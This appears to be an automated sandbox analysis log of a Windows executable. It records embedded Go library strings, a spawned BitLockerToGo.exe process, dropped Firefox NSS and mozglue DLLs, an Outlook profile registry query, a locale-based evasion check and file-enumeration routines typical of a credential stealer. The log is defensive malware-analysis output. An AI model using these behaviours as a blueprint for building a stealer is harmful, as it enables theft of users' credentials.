Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Shift).Inputs
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Shift).String
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: type:.eq.github.com/mmcloughlin/addchain/acc/ir.Instruction
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/errutil.AssertionFailure
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/print.(*Printer).Linef
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/print.(*Printer).NL
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/print.(*Printer).Printf
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/print.(*Printer).SetError
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/print.NewTabWriter
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/print.New
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: type:.eq.github.com/mmcloughlin/addchain/internal/print.Printer
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: type:.eq.github.com/mmcloughlin/addchain/internal/print.TabWriter
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ast.Identifier.Precedence
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ast.(*Identifier).Precedence
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: type:.eq.github.com/mmcloughlin/addchain/acc/ast.Statement
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.init
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.NameBinaryValues
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.NameOperands
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.NameBinaryRuns
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.init.NameBinaryRuns.NameOperands.func4
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.init.NameBinaryRuns.func2
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.init.NameBinaryValues.NameOperands.func3
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.init.NameBinaryValues.func1
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.Compile
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/errutil.UnexpectedType
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.Eval
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.Func.Execute
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.Exec
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.Concat
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.Exec.Concat.func1
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.CanonicalizeOperands
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.(*Func).Execute
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/bigvector.init
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.init
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).CheckCitable
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).IsRelease
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).WriteCitation
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).ReleaseTime
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).Title
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).WriteCitation.func2
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).WriteCitation.func1
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).RepositoryURL
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).Module
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).DOIURL
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.doiurl
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/print.(*TabWriter).Flush
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/print.(*Printer).Error
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).Citation
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).ReleaseTag
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).ReleaseURL
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).ConceptDOIURL
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: type:.eq.github.com/mmcloughlin/addchain/meta.Properties
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: net/addrselect.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/internal/bigint/bigint.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/internal/bigints/bigints.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/chain.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/program.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/acc/ir/ir.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/internal/errutil/errutil.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/internal/print/printer.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/acc/ast/ast.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/acc/pass/naming.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/acc/pass/eval.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/acc/pass/pass.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/internal/bigvector/bigvector.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/meta/meta.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/meta/cite.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/decred/dcrd/dcrec/secp256k1/v4@v4.0.1/loadprecomputed.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe File read: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe "C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe"
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" Jump to behavior
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Static file information: File size 15184384 > 1048576
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x663600
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x758000
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: BitLockerToGo.exe, 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source: Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source: Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source: Binary string: nss3.pdb@ source: BitLockerToGo.exe, 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source: Binary string: BitLockerToGo.pdb source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe, 00000000.00000002.1843071659.000000000223F000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
Source: Binary string: nss3.pdb source: BitLockerToGo.exe, 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source: Binary string: mozglue.pdb source: BitLockerToGo.exe, 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source: Binary string: BitLockerToGo.pdbGCTL source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe, 00000000.00000002.1843071659.000000000223F000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
Contains functionality to dynamically determine API calls
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02769860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_02769860
PE file contains sections with non-standard names
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Static PE information: section name: .symtab
Source: freebl3.dll.1.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.1.dr Static PE information: section name: .00cfg
Source: mozglue.dll.1.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.1.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.1.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.1.dr Static PE information: section name: .didat
Source: nss3.dll.1.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.1.dr Static PE information: section name: .00cfg
Source: softokn3.dll.1.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.1.dr Static PE information: section name: .00cfg
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0276B035 push ecx; ret 1_2_0276B048
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C82B536 push ecx; ret 1_2_6C82B549
Drops PE files
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02769860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_02769860
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking locale)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Found dropped PE file which has not been started or loaded
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe API coverage: 9.3 %
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0275BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 1_2_0275BE70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_027516D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_027516D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0275F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_0275F6B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02763EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 1_2_02763EA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0275DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 1_2_0275DA80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0275E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 1_2_0275E430
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02764910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_02764910
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0275DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_0275DE10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_027638B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 1_2_027638B0
